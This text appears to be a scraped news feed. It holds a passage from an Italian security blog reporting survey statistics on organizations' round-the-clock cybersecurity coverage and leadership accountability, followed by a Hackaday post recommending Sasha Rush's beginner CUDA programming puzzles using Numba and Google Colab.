  • Only 36% of the sample has enough staff to guarantee 24/7, year-round cybersecurity coverage
  • Only 35% use attack surface management techniques to measure attack-surface risk
  • Only 34% comply with proven frameworks, such as NIST

The inability of most companies to meet these fundamental security requirements could be linked to a lack of leadership and accountability at the top of the organization. Half (48%) of respondents said that business leaders do not consider cybersecurity their job. When asked who has, or should have, responsibility for mitigating business risk, the answers revealed a lack of clarity on the guidelines. However, 31% said that the responsibility should lie with IT teams.

The lack of clear direction on cybersecurity strategy could be the reason why more than half (54%) of respondents complained about their organization's attitude toward cyber risk, describing it as inconsistent and varying from one period to the next (54%).

The lack of a clear cyber strategy can negatively affect an organization's ability to make rapid and consistent decisions.

“It is important that Chief Information Security Officers (CISOs) communicate cyber risks clearly, using all the tools at their disposal and actively involving Boards of Directors,” says Alessandro Fontana, Country Manager of Trend Micro Italia. “To best address these challenges, companies should consider adopting an integrated solution. Such a solution must not only protect the entire attack surface, but also allow real-time risk monitoring and automated handling of critical issues. This approach significantly strengthens the organization's resilience, and it is also crucial that the platform can be integrated with third-party solutions, to guarantee complete protection and smoother security management.”

The study in fact revealed that in many organizations this does not happen, and around 96% of respondents have concerns about their attack surface. 36% would like to find a way to discover, assess and mitigate high-risk areas, while 19% are unable to work from a single source of truth.

The article "Cybersecurity: only one organization in three is able to manage cybersecurity 24 hours a day" comes from il blog della sicurezza informatica.



Learn GPU Programming With Simple Puzzles



Have you wanted to get into GPU programming with CUDA but found the usual textbooks and guides a bit too intense? Well, help is at hand in the form of a series of increasingly difficult programming ‘puzzles’ created by [Sasha Rush]. The first part of the simplification is to use the excellent Numba Python JIT compiler, which lets easy-to-understand Python code be compiled and deployed as GPU machine code. Working on these puzzles is even easier if you use the linked Google Colab as your programming environment, which launches you straight into a Jupyter notebook with the puzzles laid out. You can use your own GPU if you have one, but that’s not detailed.

The puzzles start by assuming you know nothing at all about GPU programming, which is totally the case for some of us! What’s really nice is the way the result of the program’s operation is displayed, showing graphically how data are read from and written to the input and output arrays you’re working with. Each essential concept of CUDA programming is introduced one at a time with a real programming example, making it a breeze to follow along. Just make sure you don’t watch the video below all the way through the first time, as in it [Sasha] explains all the solutions!

Confused about why you’d want to do this? Then perhaps check out our guide to CUDA first. We know what you’re thinking: how do we use non-nVIDIA hardware? Well, there’s SCALE for that! Finally, once you understand CUDA, why not have a play with WebGPU?

youtube.com/embed/K4T-YwsOxrM?…


hackaday.com/2024/09/25/learn-…